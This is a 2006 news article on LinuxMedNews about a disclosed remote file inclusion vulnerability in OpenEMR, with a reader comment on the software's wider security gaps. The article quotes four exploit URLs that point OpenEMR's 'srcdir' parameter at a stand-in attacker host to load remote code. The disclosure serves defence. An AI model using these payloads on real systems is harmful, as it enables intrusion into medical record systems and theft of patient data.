Welcome to LinuxMedNews
 up a level
 post article
 search
 admin
 Contact
 main


  OpenEMR vulnerability disclosed
OpenEMR Posted by Fred Trotter on Tuesday November 07, 2006 @ 04:03 PM
from the OpenEMR dept.
An Indonesean Hacker named Dedi Dwianto has just publicized a Vulnerability in OpenEMR. This is a significant milestone for the project. This means that OpenEMR is popular enough for a security researcher to take notice. Open Source has the potential to be more secure, but only if security researchers look for flaws and then the projects respond by fixing the code. (I wish I had hackers studying my code...) I am sure that the OpenEMR folks will be releasing a patch soon. If you are an OpenEMR user, you should upgrade to the soon-to-be-released version ASAP. Read more for a description of the vulnerability...

Fred Trotter Digg this article

Apparently, there are several places in OpenEMR where there is an unchecked GET parameter passed in. So OpenEMR is expecting a value on the local filesystem, however, you can pass in a URL for unexpected results. From the exploit...

http://target.com/[OpenEMR-path]/interface/billing/billing_process.php?srcdir=http://atacker.com/inject.txt?

http://target.com/[OpenEMR-path]/interface/new/new_patient_save.php?srcdir=http://atacker.com/inject.txt?

http://target.com/[OpenEMR-path]/login.php?srcdir=http://atacker.com/inject.txt?

http://target.com/[OpenEMR-path]/library/translation.inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?

The security researcher suggests turning off register_globals and checking for sanity in srcdir, but as I recall, OpenEMR does not use register_globals. We will have to wait for comment/patch from OpenEMR to see what the fix is.

<  |  >

 

  Related Links
  • Articles on OpenEMR
  • Also by Fred Trotter
  • Contact author
  • The Fine Print: The following comments are owned by whoever posted them.
    ( Reply )

    Re: OpenEMR vulnerability disclosed
    by Mark Leeds on Wednesday November 08, 2006 @ 02:12 AM
    I agree that this needs to be fixed. I will make the attempt myself and see what I can do to contribute to the solution. On the other hand, I believe that OpenEMR has many security holes. To secure all of them would likely mean rewriting the entire program from the ground up. For example: There are examples of strings inserted into the database from forms without any checking for malicious queries. There are areas which are hard to secure. A savvy user could enter a url directly and access an area that is supposedly secured from general user access. You have to take into account where this 'program' is being used. It is essentially a website intended for internal use. It clearly should not be exposed to the web and should not be used by patients and other non-employees. Future EMR projects should include developers who are experts in internet security. The projects should be based on frameworks which make this sort of security easier to enforce. Especially for projects who's ambition is to scale up to larger environments, such as hospitals, networked clinics, and other large healthcare systems. That being said, I use OpenEMR in my office and I love the ease with which I can modify it and tailor it to my practice. I do not expose it to the outside world and I only let trusted employees use it.
    [ Reply to this ]
    The Fine Print: The following comments are owned by whoever posted them.
    ( Reply )


     
    Google
     
    www.linuxmednews.com Web
    Advertisement: CCHIT certified EMR and Medical Practice Management Software from Medical Software Associates makes patient management easy. Free practice management and medical billing software demo available.
    All trademarks and copyrights on this page are owned by their respective companies. Comments are owned by the Poster. The Rest ©2000-2006 Ignacio Valdes, MD, MS.